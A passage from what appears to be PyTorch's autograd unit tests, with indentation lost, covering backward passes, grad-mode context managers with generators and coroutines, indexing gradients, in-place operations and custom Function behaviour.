if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
